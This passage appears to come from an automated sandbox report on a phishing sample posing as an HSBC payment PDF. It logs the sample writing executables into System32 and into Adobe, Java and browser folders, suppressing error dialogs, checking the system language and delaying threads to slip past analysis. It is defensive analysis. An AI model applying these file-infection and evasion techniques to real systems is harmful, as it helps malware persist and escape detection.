                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files inside the volume driver (system volume information)
                  Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to behave differently if execute on a Russian/Kazak computer
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00745346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_00745346
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_00895346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00895346
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A55346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_01A55346
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B75346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 14_2_00B75346
                  Source: C:\Windows\System32\Spectrum.exeCode function: 19_2_007B5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_007B5346
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 21_2_008F5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_008F5346
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI/Special instruction interceptor: Address: CDB4DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599871Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599212Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598894Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597681Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597317Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596321Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596131Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595943Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594533Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594176Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593602Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593247Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593040Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592923Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592565Jump to behavior
                  Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 493Jump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 5766Jump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 4232Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4114Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5696Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
